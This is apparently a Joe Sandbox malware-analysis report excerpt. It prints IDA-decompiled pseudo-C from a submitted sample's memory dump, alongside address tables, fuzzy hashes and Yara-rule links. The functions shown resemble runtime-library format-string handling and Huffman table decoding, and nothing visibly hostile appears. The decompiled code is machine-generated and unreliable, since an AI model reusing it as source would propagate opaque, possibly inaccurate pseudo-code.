				_t52 =  *0xe9e668; // 0x8ae5c3d8
				_v8 = _t52 ^ _t136;
				_t135 = __ecx;
				_t103 = 0;
				_t124 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t106 = 0x58;
				_t139 = _t54 - 0x64;
				if(_t139 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00E8566B(_t135);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
									L71:
									L72:
									return E00E7EEFA(_v8 ^ _t136);
								}
								_t125 =  *(_t135 + 0x20);
								_push(_t126);
								_v16 = _t103;
								_t60 = _t125 >> 4;
								_v12 = _t103;
								_t127 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
									__eflags = _t112 - 0x78;
									if(_t112 == 0x78) {
										L48:
										_t62 = _t125 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t112 - 0x61;
											if(_t112 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t128 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
													__eflags = _t112 - _t65;
													if(_t112 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t103 = _t103 + 2;
														__eflags = _t103;
														L62:
														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
														__eflags = _t125 & 0x0000000c;
														if((_t125 & 0x0000000c) == 0) {
															E00E83F00(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
															_t137 = _t137 + 0x10;
														}
														E00E85986(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
														_t114 =  *(_t135 + 0x20);
														_t104 = _t135 + 0x18;
														_t75 = _t114 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t116 = _t114 >> 2;
															__eflags = _t116 & 0x00000001;
															if((_t116 & 0x00000001) == 0) {
																E00E83F00(_t135 + 0x448, 0x30, _t131, _t104);
																_t137 = _t137 + 0x10;
															}
														}
														E00E85868(_t135, 0);
														__eflags =  *_t104;
														if( *_t104 >= 0) {
															_t78 =  *(_t135 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00E83F00(_t135 + 0x448, 0x20, _t131, _t104);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t112 - _t86;
													if(_t112 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t133 = 0x41;
											__eflags = _t112 - _t133;
											if(_t112 == _t133) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t112 - _t88;
									if(_t112 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t125 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t125;
									if((1 & _t125) == 0) {
										_t92 = _t125 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t127;
										L45:
										_t103 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							goto L72;
						}
						_t96 = _t55;
						__eflags = _t96;
						if(__eflags == 0) {
							L28:
							_push(_t103);
							_push(0xa);
							L29:
							_t56 = E00E85403(_t135, _t126, __eflags);
							goto L10;
						}
						__eflags = _t96 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00E855E0(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00E85169(_t103, _t135);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t135 + 0x20;
						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00E8554D(__ecx, _t124);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00E855C1(__ecx);
					goto L10;
				}
				if(_t139 == 0) {
					goto L27;
				}
				_t140 = _t54 - _t106;
				if(_t140 > 0) {
					_t98 = _t54 - 0x5a;
					__eflags = _t98;
					if(_t98 == 0) {
						_t56 = E00E84FAC(__ecx);
						goto L10;
					}
					_t99 = _t98 - 7;
					__eflags = _t99;
					if(_t99 == 0) {
						goto L30;
					}
					__eflags = _t99;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00E8536B(_t135, __eflags, _t103);
					goto L10;
				}
				if(_t140 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t124) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00e84c39
0x00e84c41
0x00e84c48
0x00e84c4d
0x00e84c4f
0x00e84c53
0x00e84c56
0x00e84c5a
0x00e84c5b
0x00e84c5e
0x00e84ccb
0x00e84cce
0x00e84d1d
0x00e84d1d
0x00e84d20
0x00e84c8c
0x00e84c8e
0x00e84c93
0x00e84c95
0x00e84d3b
0x00e84d3e
0x00e84e84
0x00e84e86
0x00e84e95
0x00e84e95
0x00e84d44
0x00e84d49
0x00e84d4c
0x00e84d4f
0x00e84d53
0x00e84d59
0x00e84d5a
0x00e84d5c
0x00e84d86
0x00e84d86
0x00e84d8a
0x00e84d8d
0x00e84d97
0x00e84d99
0x00e84d9c
0x00e84d9e
0x00e84da4
0x00e84da4
0x00e84da6
0x00e84da6
0x00e84da9
0x00e84db7
0x00e84db7
0x00e84db9
0x00e84dbb
0x00e84dbc
0x00e84dbe
0x00e84dc4
0x00e84dc6
0x00e84dc7
0x00e84dcc
0x00e84dcf
0x00e84ddd
0x00e84ddd
0x00e84ddf
0x00e84ddf
0x00e84dea
0x00e84dec
0x00e84df1
0x00e84df1
0x00e84df4
0x00e84dfa
0x00e84dfc
0x00e84dff
0x00e84e0f
0x00e84e14
0x00e84e14
0x00e84e29
0x00e84e2e
0x00e84e31
0x00e84e36
0x00e84e39
0x00e84e3b
0x00e84e3d
0x00e84e40
0x00e84e43
0x00e84e50
0x00e84e55
0x00e84e55
0x00e84e43
0x00e84e5c
0x00e84e61
0x00e84e64
0x00e84e69
0x00e84e6c
0x00e84e6e
0x00e84e7b
0x00e84e80
0x00e84e6e
0x00000000
0x00e84e83
0x00e84dd3
0x00e84dd4
0x00e84dd7
0x00000000
0x00000000
0x00e84dd9
0x00000000
0x00e84dd9
0x00e84dc0
0x00e84dc2
0x00000000
0x00000000
0x00000000
0x00e84dc2
0x00e84dad
0x00e84dae
0x00e84db1
0x00000000
0x00000000
0x00e84db3
0x00000000
0x00e84db3
0x00000000
0x00e84da0
0x00e84d91
0x00e84d92
0x00e84d95
0x00000000
0x00000000
0x00000000
0x00e84d95
0x00e84d60
0x00e84d63
0x00e84d65
0x00e84d70
0x00e84d72
0x00e84d7a
0x00e84d7c
0x00e84d7e
0x00000000
0x00000000
0x00e84d80
0x00e84d84
0x00e84d84
0x00000000
0x00e84d84
0x00e84d74
0x00e84d69
0x00e84d69
0x00e84d6a
0x00000000
0x00e84d6a
0x00e84d67
0x00000000
0x00e84d67
0x00e84c9b
0x00000000
0x00e84c9b
0x00e84d27
0x00e84d27
0x00e84d2a
0x00e84cfc
0x00e84cfc
0x00e84cfd
0x00e84cff
0x00e84d01
0x00000000
0x00e84d01
0x00e84d2c
0x00e84d2f
0x00000000
0x00000000
0x00e84d35
0x00e84ca4
0x00e84ca4
0x00000000
0x00e84ca4
0x00e84cd0
0x00e84d13
0x00000000
0x00e84d13
0x00e84cd2
0x00e84cd5
0x00e84d08
0x00e84d0a
0x00000000
0x00e84d0a
0x00e84cd7
0x00e84cda
0x00e84cf8
0x00e84cf8
0x00e84cf8
0x00e84cf8
0x00000000
0x00e84cf8
0x00e84cdc
0x00e84cdf
0x00e84cf1
0x00000000
0x00e84cf1
0x00e84ce1
0x00e84ce4
0x00000000
0x00000000
0x00e84ce8
0x00000000
0x00e84ce8
0x00e84c60
0x00000000
0x00000000
0x00e84c66
0x00e84c68
0x00e84ca8
0x00e84ca8
0x00e84cab
0x00e84cc4
0x00000000
0x00e84cc4
0x00e84cad
0x00e84cad
0x00e84cb0
0x00000000
0x00000000
0x00e84cb3
0x00e84cb6
0x00000000
0x00000000
0x00e84cb8
0x00e84cbb
0x00000000
0x00e84cbb
0x00e84c6a
0x00e84ca2
0x00000000
0x00e84ca2
0x00e84c6e
0x00000000
0x00000000
0x00e84c77
0x00000000
0x00000000
0x00e84c7c
0x00000000
0x00000000
0x00e84c81
0x00000000
0x00000000
0x00e84c8a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7425e75f3542e09ea81a429e63352fd45aaf00cdb639989967de9612fc7ba9ec
Instruction ID: 7076dabb02a2042d66655c0edb67f1a503039359bfa0cd0880d2eab4c4659980
Opcode Fuzzy Hash: 7425e75f3542e09ea81a429e63352fd45aaf00cdb639989967de9612fc7ba9ec
Instruction Fuzzy Hash: 666156F2640B0B66EF34BA288891BFEA3D8EF41708F14391AE94EFF2D1D6519D418355

Uniqueness

Uniqueness Score: -1.00%

Function 00E73FAE Relevance: .2, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00E73FAE(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E00E6A9EE(_t168) >> 0x0000000c & 0x000000ff;
							E00E6A9D7(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E00E6A9EE(_t168) >> 0x0000000c & 0x000000ff;
							E00E6A9D7(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00E732D2();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E00E6A9F3(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E00E6A9EE(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E00E6A9EE(_t139) >> 0xd) + 3;
													_push(3);
												}
												E00E6A9D7(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E00E6A9EE(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E00E6A9EE(_t139) >> 0xd) + 3;
												_push(3);
											}
											E00E6A9D7(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00E74A3C(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00E732D2();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00E732D2();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00E732D2();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00E732D2();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00E74A3C(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

0x00e73fbd
0x00e73fbf
0x00e73fc9
0x00e73fd0
0x00e73fd4
0x00e73ff0
0x00e73ff1
0x00e73ff1
0x00e73ff4
0x00e74002
0x00e74005
0x00e7400a
0x00e7400d
0x00e74046
0x00000000
0x00e74046
0x00e7401d
0x00e74020
0x00e74025
0x00e74027
0x00e74030
0x00e74030
0x00e74033
0x00e74033
0x00e74034
0x00e74037
0x00000000
0x00000000
0x00e74039
0x00e7403e
0x00e7403f
0x00e74041
0x00000000
0x00000000
0x00000000
0x00e74041
0x00e74043
0x00000000
0x00e74043
0x00e74029
0x00e7404a
0x00e7404a
0x00e7404b
0x00e7404b
0x00e7405b
0x00e7405d
0x00e74065
0x00e74066
0x00e74067
0x00e7406b
0x00e74070
0x00e74070
0x00e74072
0x00e74072
0x00e74076
0x00e74094
0x00e74096
0x00e7409d
0x00e740a3
0x00e740a9
0x00e740ad
0x00e740da
0x00e740db
0x00e740dc
0x00e740e0
0x00e740e2
0x00e740fd
0x00e74100
0x00e7410c
0x00e7410e
0x00e74112
0x00e74117
0x00e74123
0x00e74125
0x00e74127
0x00e74129
0x00e74129
0x00e7412b
0x00e74133
0x00e74133
0x00e74136
0x00e74142
0x00e74144
0x00e74147
0x00e74191
0x00e741ae
0x00e741ae
0x00e741b1
0x00e74193
0x00e7419d
0x00e741a0
0x00e741a0
0x00e741b5
0x00e741ba
0x00e741ba
0x00e741bb
0x00e741c1
0x00000000
0x00000000
0x00e741c3
0x00e741c8
0x00e741c9
0x00e741cb
0x00000000
0x00000000
0x00e741cd
0x00e741cd
0x00000000
0x00e741cd
0x00000000
0x00e741ba
0x00e74149
0x00e7414c
0x00e74169
0x00e74169
0x00e7416c
0x00e7414e
0x00e74158
0x00e7415b
0x00e7415b
0x00e74170
0x00e74175
0x00e74177
0x00e741f4
0x00e741f4
0x00e7425b
0x00e7425d
0x00000000
0x00e74179
0x00e74179
0x00e74179
0x00e7417a
0x00e74180
0x00000000
0x00000000
0x00e74186
0x00e7418a
0x00e7418b
0x00e7418d
0x00000000
0x00000000
0x00000000
0x00e7418f
0x00000000
0x00e74179
0x00e74177
0x00e74138
0x00e7413c
0x00000000
0x00e7413c
0x00e740e7
0x00e740ea
0x00e740ea
0x00e740ec
0x00000000
0x00000000
0x00e740ee
0x00e740ef
0x00e740f2
0x00e740f5
0x00000000
0x00000000
0x00000000
0x00e740f7
0x00e740f9
0x00000000
0x00e740f9
0x00e740b1
0x00e740b4
0x00e740be
0x00e740c6
0x00e740cb
0x00e740ce
0x00000000
0x00e740ce
0x00e74081
0x00e74083
0x00000000
0x00000000
0x00e74087
0x00e7408c
0x00e7408e
0x00000000
0x00000000
0x00000000
0x00e741d1
0x00e741d1
0x00e741d1
0x00e741dd
0x00e741dd
0x00e741e4
0x00e741e8
0x00e741f8
0x00e741f8
0x00e74203
0x00e74208
0x00e74209
0x00e7420c
0x00e74211
0x00e7421b
0x00e74223
0x00e74224
0x00e74229
0x00e74233
0x00e7423b
0x00e7423c
0x00e74241
0x00e74249
0x00e74251
0x00e74254
0x00e74259
0x00000000
0x00e74259
0x00e741ec
0x00e741f2
0x00000000
0x00000000
0x00000000
0x00e741f2
0x00e73fdf
0x00e73fe1
0x00000000
0x00000000
0x00e73fe3
0x00e73fe8
0x00e73fea
0x00000000
0x00000000
0x00000000
0x00e73fea
0x00000000

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7143b401136632ee41cc728dc3e906afaa0c283aea16f65d0c64829696432638
Instruction ID: f899b1c316273751939e77f35a135bddc1b059b80ec13fc40bcb6d7e39a6d62a
Opcode Fuzzy Hash: 7143b401136632ee41cc728dc3e906afaa0c283aea16f65d0c64829696432638
Instruction Fuzzy Hash: 0A714EB17443455BDB24EE28D8C1BAD73D0EBA1308F50993DEA9EA71C2DB3489C5C752

Uniqueness

Uniqueness Score: -1.00%

Function 00E84A0A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E00E84A0A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00E855F8(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00E83ED4(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00E858F3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00E83ED4(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00E857C1(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00E83ED4(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00E85403(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00E855E0(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00E8500F(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00E8554D(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00E855C1(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00E84F49(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00E852DB(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00e84a0f
0x00e84a12
0x00e84a16
0x00e84a19
0x00e84a1d
0x00e84a20
0x00e84a8e
0x00e84a91
